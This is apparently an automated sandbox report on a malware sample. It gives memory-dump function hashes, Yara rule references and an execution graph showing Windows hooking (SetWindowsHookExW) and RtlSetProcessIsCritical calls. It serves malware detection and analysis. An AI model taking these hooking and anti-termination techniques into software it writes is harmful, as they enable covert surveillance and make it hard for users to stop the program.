                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction ID: b45e4fb456605a37cccd527d3d164a5e03d830921532a7251777528aaf4e9cb7
                                                                        • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction Fuzzy Hash: 0FD09E72D0013D978B10AFE9DC054EFFF79EF05A50B418166F915A7100D3715A21DBD1
                                                                        Function 091FA2A0 Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7c66947632f7b6557eefbf7552f2f4b2aceb676a8249eef55242b193224bdd0
                                                                        • Instruction ID: 7834474733f62d30a6341e6b2ef36411a65971d075c62abf8f1ac72251ab415f
                                                                        • Opcode Fuzzy Hash: c7c66947632f7b6557eefbf7552f2f4b2aceb676a8249eef55242b193224bdd0
                                                                        • Instruction Fuzzy Hash: 07D023B3CD504C0ECF140140AE5D2CC6FA193D9301F1A041BE4DCCA081F5A0C5C14DE1
                                                                        Function 091FA2B0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28693122d5fd9cfc7c6acd0433d04ff63e08e3962f569facf73c2165d21b7060
                                                                        • Instruction ID: ec69b29fa6e4945082f7da790ab121f61873a1a82a4bcfd132751fda06592131
                                                                        • Opcode Fuzzy Hash: 28693122d5fd9cfc7c6acd0433d04ff63e08e3962f569facf73c2165d21b7060
                                                                        • Instruction Fuzzy Hash: F7C08C31052A0887C6002BD6F90E3683EA8AB8132AF400020F10D454206FA64851CEB1
                                                                        Function 091F55D0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 323c5b45409a8539e51d43f8939f465f42af9b59e5f3e8493378aafe91ccea0e
                                                                        • Instruction ID: 17fc3674f3432209fc35cd125d046a3048147729c1b761ce527414ade8758e0c
                                                                        • Opcode Fuzzy Hash: 323c5b45409a8539e51d43f8939f465f42af9b59e5f3e8493378aafe91ccea0e
                                                                        • Instruction Fuzzy Hash: BAC02BFB2090804EF7097B00DC18F007F10EBF020DB5FC483A140DA572F546C0248705
                                                                        Function 091FA6AB Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49f21bf0eb262392851cf9525c6e778a5e4f93c4f188cea5696d6bcbb4a4ded3
                                                                        • Instruction ID: e2317ede0232be4e673b77186379735c649ddcd1a92e5a1bd32aaef463b5ef40
                                                                        • Opcode Fuzzy Hash: 49f21bf0eb262392851cf9525c6e778a5e4f93c4f188cea5696d6bcbb4a4ded3
                                                                        • Instruction Fuzzy Hash: 49D09274A02229CBDB11EF28E8A5B887BB2FB45314F114695E0096B210DB701A84CF81
                                                                        Function 091FAE4E Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1fb3ac54f1d3a176cdeda9ae6d3fc747e43755eff780d26f1b555ac3517fee30
                                                                        • Instruction ID: 70e647226f50f1fe882f94f01abf467730dbe7c264a58dea3ee846547e698b34
                                                                        • Opcode Fuzzy Hash: 1fb3ac54f1d3a176cdeda9ae6d3fc747e43755eff780d26f1b555ac3517fee30
                                                                        • Instruction Fuzzy Hash: CDD0C974D14148CFCB04DBE0E02009CBBB4FF593057048019D419AA606D73618068F00
                                                                        Function 091F58E4 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 380957c0f828d62264048bfd831d16de16966e3197a92b88ff8a393f99be4920
                                                                        • Instruction ID: 643d0eec03175ed5d4268102f7f1aff8ef42d7ff775a6913e69251651ef65a3c
                                                                        • Opcode Fuzzy Hash: 380957c0f828d62264048bfd831d16de16966e3197a92b88ff8a393f99be4920
                                                                        • Instruction Fuzzy Hash: 62B01276365204B2490C67F44CA0F3F9412FFF7794B40DC01334406040C7714424D62F

                                                                        Non-executed Functions

                                                                        Function 091FED00 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e6c3d7be32941f52c3fb6995da732d6c3007a2f0313c25430caf6c220d7b8ac9
                                                                        • Instruction ID: 5907f34c20dcbc5c7b3f67e4a4e84c7fddcdc2867f67163516fe8a0ab28907b5
                                                                        • Opcode Fuzzy Hash: e6c3d7be32941f52c3fb6995da732d6c3007a2f0313c25430caf6c220d7b8ac9
                                                                        • Instruction Fuzzy Hash: 6AE12974E001598FCB14DFA8C5909AEFBB2FF89304F248169E519AB356D730A942CFA0
                                                                        Function 091FF138 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4b3e47ab73683a46deec028301c49fa3591eb71fd3f16e55d2a628b725a1e9b
                                                                        • Instruction ID: e7cb5ac66553ac6f492e929f2faddc3faea87d40d1e5a4dae0d528812b293475
                                                                        • Opcode Fuzzy Hash: d4b3e47ab73683a46deec028301c49fa3591eb71fd3f16e55d2a628b725a1e9b
                                                                        • Instruction Fuzzy Hash: 63E11974E001198FCB14DFA9C5909AEFBF2FF89304F248169E919AB355D770A946CFA0
                                                                        Function 091FF570 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6919a24b0aac55817b4162c4e11339ba6b95efcf84c31b7a41424ac07237b832
                                                                        • Instruction ID: 3157279698b9f54b71c814e5be4d86979f1c56b0e65a660d3f587b0f5e9182b3
                                                                        • Opcode Fuzzy Hash: 6919a24b0aac55817b4162c4e11339ba6b95efcf84c31b7a41424ac07237b832
                                                                        • Instruction Fuzzy Hash: A1E11B74E001598FCB14DFA9C5909AEFBB2FF89304F248169E519AB355DB70A942CFA0
                                                                        Function 07850478 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0997f9257b5922f458aac46b9c18b2f24281808374ec7980b1e6df17b0e2c65
                                                                        • Instruction ID: 5d5df5679420b60f30025a7412f321fd784146e2cf2825458577cae0aefd5b2b
                                                                        • Opcode Fuzzy Hash: b0997f9257b5922f458aac46b9c18b2f24281808374ec7980b1e6df17b0e2c65
                                                                        • Instruction Fuzzy Hash: 94E1FCB4E042598FCB14DFA9C590AAEFBF2FF89304F248169D815AB355D731A941CFA0
                                                                        Function 07850040 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0d04ded2fddb0d379daf39f26079d967579ae19b79847017affd3d2ec0d9cee
                                                                        • Instruction ID: 249bd489a3ae9b439de43b20119540c618dc539361d777501bf64a1c648b9394
                                                                        • Opcode Fuzzy Hash: a0d04ded2fddb0d379daf39f26079d967579ae19b79847017affd3d2ec0d9cee
                                                                        • Instruction Fuzzy Hash: 3EE10BB4E041598FCB14DFA9C580AAEFBB2FF89305F248169D815AB355D730AD42CFA1
                                                                        Function 091F6669 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b475a11d87ff548b08e7ae2316fb1d355bca747485d957d3d9029c640439f1bf
                                                                        • Instruction ID: 5ec7c2469d435a421dc3cb2aee99364e918980784911cb3727361ef9772d3e8c
                                                                        • Opcode Fuzzy Hash: b475a11d87ff548b08e7ae2316fb1d355bca747485d957d3d9029c640439f1bf
                                                                        • Instruction Fuzzy Hash: 4FD1DA35D2065A8ACB10EBA9D950A9DB7B1FFD9300F50CB9AE0097B214FB706AC5CF51
                                                                        Function 091F6678 Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdfc167db3fd3631018575e1291f4b27216fc62618ba20b226dc18fbb9bc7ccd
                                                                        • Instruction ID: 8dc72e227215a5ff798426b1c3f94ad6ee134d9db784a144321d719e7e3fc793
                                                                        • Opcode Fuzzy Hash: bdfc167db3fd3631018575e1291f4b27216fc62618ba20b226dc18fbb9bc7ccd
                                                                        • Instruction Fuzzy Hash: 14D1CA35D2065A8ACB10EBA9D950A9DB7B1FFD9300F50CB9AE0097B214FB706AC5CF51
                                                                        Function 0150D57C Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2798b21563c239228f2f299f54120048f250ca9c8feb649b1805c6a0234cac1
                                                                        • Instruction ID: 9805133cd2b064a7227e8eb7952e813d775b9f9fd797f03d5fbdba120ed051da
                                                                        • Opcode Fuzzy Hash: a2798b21563c239228f2f299f54120048f250ca9c8feb649b1805c6a0234cac1
                                                                        • Instruction Fuzzy Hash: F5A16032E002168FCF2ADFB5C94459EBBB2FFC5300B15856AE905AF2A5DB71D946CB40
                                                                        Function 091FECBC Relevance: .2, Instructions: 162COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a240b65577343daedd87231712821f2b61aff9b74af37e111abf93ca3f3f49c
                                                                        • Instruction ID: 6bc0490541f55f5bd2da34458cdc005fbbe5fb04c612b5935780f4da8c1b90c5
                                                                        • Opcode Fuzzy Hash: 2a240b65577343daedd87231712821f2b61aff9b74af37e111abf93ca3f3f49c
                                                                        • Instruction Fuzzy Hash: 6B518F74E052598FCB14DFA9D5904EEFBF2BF89304F24C1AAD418AB266C7305942CFA1
                                                                        Function 091FF128 Relevance: .1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7926ef09ecc080208d7d77752292525bac8c0b68c92aa3c43a3ea67845fd9675
                                                                        • Instruction ID: 3310f356d87cec40a35af463d0d128b68989d432c7d474cf80a412a498a48321
                                                                        • Opcode Fuzzy Hash: 7926ef09ecc080208d7d77752292525bac8c0b68c92aa3c43a3ea67845fd9675
                                                                        • Instruction Fuzzy Hash: 3F514B74E002198FCB14DFA9D5909AEFBF2BF89304F24C16AD518AB356D7309942CFA0
                                                                        Function 091FF560 Relevance: .1, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: def45fb4eba513dcf7c9db4c28dda363f23e8e7ee11d563c7f173b78b76ef6d1
                                                                        • Instruction ID: f1d5c603eab916f8228f0220d0090073e5ccbe095096d371b8ca6f0981fa8f1b
                                                                        • Opcode Fuzzy Hash: def45fb4eba513dcf7c9db4c28dda363f23e8e7ee11d563c7f173b78b76ef6d1
                                                                        • Instruction Fuzzy Hash: B151F674E046198FCB14DFA9D5909AEFBB2BF89304F24C169E418AB355DB319942CFA0
                                                                        Function 091F34A8 Relevance: .1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 378bb7e88d3377c29c416474f2501024c41872654196409547a913a4aba70ac7
                                                                        • Instruction ID: 44837cdd98bcff85e3b476688d5882499a2d6b08061b15dc45fa05288fa048de
                                                                        • Opcode Fuzzy Hash: 378bb7e88d3377c29c416474f2501024c41872654196409547a913a4aba70ac7
                                                                        • Instruction Fuzzy Hash: B941AB75E016188BEB68CF6AC95079EFAF3AFC9304F14C1A5D518AB214EB305986CF50

                                                                        Execution Graph

                                                                        Execution Coverage:8.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:31
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 14371 18fb520 14372 18fb566 GetCurrentProcess 14371->14372 14374 18fb5b8 GetCurrentThread 14372->14374 14375 18fb5b1 14372->14375 14376 18fb5ee 14374->14376 14377 18fb5f5 GetCurrentProcess 14374->14377 14375->14374 14376->14377 14378 18fb62b 14377->14378 14384 18fb700 14378->14384 14388 18fb6f0 14378->14388 14393 18fb760 14378->14393 14379 18fb653 GetCurrentThreadId 14380 18fb684 14379->14380 14385 18fb705 14384->14385 14399 18fb220 14385->14399 14389 18fb6ca 14388->14389 14390 18fb6fa 14388->14390 14389->14379 14391 18fb220 DuplicateHandle 14390->14391 14392 18fb72e 14391->14392 14392->14379 14394 18fb767 DuplicateHandle 14393->14394 14395 18fb70b 14393->14395 14396 18fb7fe 14394->14396 14397 18fb72e 14395->14397 14398 18fb220 DuplicateHandle 14395->14398 14396->14379 14397->14379 14398->14397 14400 18fb768 DuplicateHandle 14399->14400 14401 18fb72e 14400->14401 14401->14379 14402 18f6410 14403 18f6454 SetWindowsHookExW 14402->14403 14405 18f649a 14403->14405 14406 18f6270 14407 18f62b4 RtlSetProcessIsCritical 14406->14407 14408 18f6311 14407->14408

                                                                        Executed Functions

                                                                        Function 018FB51A Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 103 18fb51a-18fb5af GetCurrentProcess 108 18fb5b8-18fb5ec GetCurrentThread 103->108 109 18fb5b1-18fb5b7 103->109 110 18fb5ee-18fb5f4 108->110 111 18fb5f5-18fb629 GetCurrentProcess 108->111 109->108 110->111 113 18fb62b-18fb631 111->113 114 18fb632-18fb64a 111->114 113->114 125 18fb64d call 18fb700 114->125 126 18fb64d call 18fb760 114->126 127 18fb64d call 18fb6f0 114->127 117 18fb653-18fb682 GetCurrentThreadId 118 18fb68b-18fb6ed 117->118 119 18fb684-18fb68a 117->119 119->118 125->117 126->117 127->117
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 018FB59E
                                                                        • GetCurrentThread.KERNEL32 ref: 018FB5DB
                                                                        • GetCurrentProcess.KERNEL32 ref: 018FB618
                                                                        • GetCurrentThreadId.KERNEL32 ref: 018FB671
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 119643c27d5dee0f347f05b6abcfe6e8faa66750adbb2d3a968696a3133fe0cd
                                                                        • Instruction ID: d960ccf0d9f28e1d274ff46bb1cea7a68f376e13a88d9f6e26ff9b9c02c7beaa
                                                                        • Opcode Fuzzy Hash: 119643c27d5dee0f347f05b6abcfe6e8faa66750adbb2d3a968696a3133fe0cd
                                                                        • Instruction Fuzzy Hash: C95153B0900249CFDB14CFAAD448BAEBBF1EF88314F24841DE509A7360DB39A944CF65
                                                                        Function 018FB520 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 128 18fb520-18fb5af GetCurrentProcess 132 18fb5b8-18fb5ec GetCurrentThread 128->132 133 18fb5b1-18fb5b7 128->133 134 18fb5ee-18fb5f4 132->134 135 18fb5f5-18fb629 GetCurrentProcess 132->135 133->132 134->135 137 18fb62b-18fb631 135->137 138 18fb632-18fb64a 135->138 137->138 149 18fb64d call 18fb700 138->149 150 18fb64d call 18fb760 138->150 151 18fb64d call 18fb6f0 138->151 141 18fb653-18fb682 GetCurrentThreadId 142 18fb68b-18fb6ed 141->142 143 18fb684-18fb68a 141->143 143->142 149->141 150->141 151->141
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 018FB59E
                                                                        • GetCurrentThread.KERNEL32 ref: 018FB5DB
                                                                        • GetCurrentProcess.KERNEL32 ref: 018FB618
                                                                        • GetCurrentThreadId.KERNEL32 ref: 018FB671
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: e44eb455e3021f2634b35b54d5289a587cc71554f0814baa6ba630a950fefd58
                                                                        • Instruction ID: 48ee011fb8661745879f2acd5c7ffd861a92bc9a3fa553f9f7b9b4c7f2ee7c4e
                                                                        • Opcode Fuzzy Hash: e44eb455e3021f2634b35b54d5289a587cc71554f0814baa6ba630a950fefd58
                                                                        • Instruction Fuzzy Hash: 945143B0900249CFDB14CFAAD548BAEBBF1EF88314F24851DE509A7360DB39A944CF65
                                                                        Function 018FB760 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1266 18fb760-18fb765 1267 18fb70b 1266->1267 1268 18fb767-18fb7fc DuplicateHandle 1266->1268 1271 18fb70d-18fb70f 1267->1271 1272 18fb711-18fb713 1267->1272 1269 18fb7fe-18fb804 1268->1269 1270 18fb805-18fb822 1268->1270 1269->1270 1271->1272 1273 18fb719-18fb71b 1272->1273 1274 18fb715-18fb717 1272->1274 1275 18fb71d-18fb71f 1273->1275 1276 18fb721-18fb727 1273->1276 1274->1273 1275->1276 1279 18fb72e-18fb754 1276->1279 1280 18fb729 call 18fb220 1276->1280 1280->1279
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FB72E,?,?,?,?,?), ref: 018FB7EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 895abb479125da0ce98ebbf53812f0c0ee2b2595ed598bd3f151e216d4eac2bc
                                                                        • Instruction ID: 22bdb4e82e5e940c561482c78be113a5057ed0987a23f91b235e2879fcaed6fd
                                                                        • Opcode Fuzzy Hash: 895abb479125da0ce98ebbf53812f0c0ee2b2595ed598bd3f151e216d4eac2bc
                                                                        • Instruction Fuzzy Hash: D73148B5900248DFDB11CFA9E884ADEBFF5EB48310F14841AEA14E7310C3359A15DFA0
                                                                        Function 018F6259 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlSetProcessIsCritical.NTDLL(?,?), ref: 018F6302
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalProcess
                                                                        • String ID:
                                                                        • API String ID: 2695349919-0
                                                                        • Opcode ID: 23e8a5132feb7e0ff2a30f95636bfbc119b1cb196dffe383b105886c3bd41dfa
                                                                        • Instruction ID: 05191b49dd3c321d4175c382bc0550cfe869c096c94160b05081913ccf1ca735
                                                                        • Opcode Fuzzy Hash: 23e8a5132feb7e0ff2a30f95636bfbc119b1cb196dffe383b105886c3bd41dfa
                                                                        • Instruction Fuzzy Hash: 0A217AB1C01259CFDB10CF9AD480BEEBBF4EF59320F18816AE555A3650C3389A44CF61
                                                                        Function 018F6270 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlSetProcessIsCritical.NTDLL(?,?), ref: 018F6302
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalProcess
                                                                        • String ID:
                                                                        • API String ID: 2695349919-0
                                                                        • Opcode ID: 5abb9b823c1696edcc3a216b1c3c875ff5ec0ba862f3fa58a3ef93037d6ac701
                                                                        • Instruction ID: 024a40d57445a808504f7a53a0a4217c134f2791cb7ca0536c87e786721e7213
                                                                        • Opcode Fuzzy Hash: 5abb9b823c1696edcc3a216b1c3c875ff5ec0ba862f3fa58a3ef93037d6ac701
                                                                        • Instruction Fuzzy Hash: DA2145B2801259CFDB10CF9AD880BEEBBF4EF59320F14816AE555A3240D338AA44CF61
                                                                        Function 018FB220 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FB72E,?,?,?,?,?), ref: 018FB7EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 4f3dc7cec7516d9c2183e6be7bedf6d302cd25fed8d77a342f6a44fae83ed72d
                                                                        • Instruction ID: 4c74eb757f8ada6e0d4ad084d7bdb9cd2611ff188e3cc8b14828630d9e341257
                                                                        • Opcode Fuzzy Hash: 4f3dc7cec7516d9c2183e6be7bedf6d302cd25fed8d77a342f6a44fae83ed72d
                                                                        • Instruction Fuzzy Hash: 8521E6B5900248EFDB10CF9AD584AEEFFF9EB48320F14841AE914A7310D374A944CFA5
                                                                        Function 018F6408 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 018F648B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 95aef7e473bcb8d5c2e60654e63ccd9093d51ee425080bce8c6fe0ccd23f0c2f
                                                                        • Instruction ID: 0700566580cf301c3eba2a4b5787d1e744d4c55aa5747b8ab7d9442a6f009bc7
